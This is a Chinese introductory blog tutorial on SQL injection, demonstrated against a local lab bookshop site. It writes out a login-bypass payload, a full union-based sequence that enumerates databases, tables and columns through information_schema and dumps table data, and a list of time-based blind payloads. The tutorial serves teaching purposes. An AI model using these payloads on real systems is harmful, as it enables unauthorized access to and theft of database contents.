初识SQL注入 – 作者:hahali

原理介绍

当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库进行执行,获取或修改数据库中的数据。

SQL注入漏洞有两个关键条件:

  • 用户能控制输入的内容
  • web应用把用户输入的内容带入到数据库中执行

接下来将用自己本地搭建的环境来演示SQL注入。。。。

别想了,我怎么可能把真实网站的注入过程写在博客上,不想请喝茶

一、万能密码

打开网站的登陆界面,我们没有密码是无法登陆的但是由于网站开发者在开发网站时没有对登陆进行过滤,导致存在万能密码漏洞

图片[1]-初识SQL注入 – 作者:hahali-安全小百科

输入万能密码 root ‘ or 1 = 1#

图片[2]-初识SQL注入 – 作者:hahali-安全小百科

点击登陆,就会提示我们登陆成功!

图片[3]-初识SQL注入 – 作者:hahali-安全小百科

看,我们已经登陆进来了!

图片[4]-初识SQL注入 – 作者:hahali-安全小百科

原理

登陆语句是这样的:

SELECT * FROM admin WHERE Username=’root’ and Password =’pass’

查询admi表里所有Username =我们输入的Username 并且Password =我们输入的Password的结果

只要结果不为空就为真,也就是登陆成功

我们输入万能密码root ‘ or 1 = 1# 构造

SELECT * FROM admin WHERE Username=’root ‘ or 1 = 1#’and Password =’pass’

通过注释符号#注释掉and Password =’pass,在root’ or 1=1 的基础上使结果为真成立。

SQL注入

SQL注入分类

SQL注入,从代码角度来看:

分为数字型和字符型,又根据字符型和数字型可以外加()和字符型能使用双引号和单引号

分为以下几种:

1、selent * from users where id=1纯数字

2、selent * from users where id=’1’只加单引号

3、selent * from users where id=”1”只加双引号

4、selent * from users where (id=1)数字加括号

5、selent * from users where (id=’1’)数字加单引号

6、selent * from users where (id=”1”)数字加双引号

如果写的不够清晰,我们可以用一张图来解释

图片[5]-初识SQL注入 – 作者:hahali-安全小百科

实例演示

打开搭建好的环境,点击打开一个页面来测试有没有SQL注入

图片[6]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=55’ 出现问题,可能存在注入

图片[7]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=55’ %23 加%23后恢复正常,可以判断为’1’注入

图片[8]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=55’ order by 1 %23 使用order by 1 2 3 4 进行测试,发现查询的结果为12列,再这里我只显示结尾截图,方便后续使用union select

图片[9]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3,4,5,6,7,8,9,10,11,12 %23 发现页面不显示union select的内容,尝试使用limit或者是将前边的内容改为空

图片[10]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 limit 1,1 %23

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 %23 可以显示union select后的内容,8是显示结果的地方

图片[11]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,user(),9,10,11,12 %23 把8位改为user()和database()发现可以显示用户和数据库

图片[12]-初识SQL注入 – 作者:hahali-安全小百科

图片[13]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(schema_name) from information_schema.SCHEMATA),9,10,11,12 %23

查询所有的库名字

图片[14]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(table_name) from information_schema.TABLES where table_schema = ‘test’),9,10,11,12 %23

查询出test库中所有的表名

图片[15]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(column_name) from information_schema.COLUMNS where table_schema = ‘test’ and table_name = ‘admin’),9,10,11,12 %23 查询处test库中admin表所有的字段名字

图片[16]-初识SQL注入 – 作者:hahali-安全小百科

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(news) from test.admin ),9,10,11,12 %23

查询security库中users表中的数据,由于这个表中没有数据所以不会有显示,但在真实环境中是会看到内容的

图片[17]-初识SQL注入 – 作者:hahali-安全小百科

延时盲注

延时盲注会有以下几种情况,暂不做演示

1’ and sleep(5) %23

1’) and sleep(5) %23

1’)) and sleep(5) %23

1 and sleep(5) %23

1) and sleep(5) %23

1)) and sleep(5) %23

1” and sleep(5) %23

1”) and sleep(5) %23

1”)) and sleep(5) %23

来源:freebuf.com 2020-07-24 09:32:46 by: hahali

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论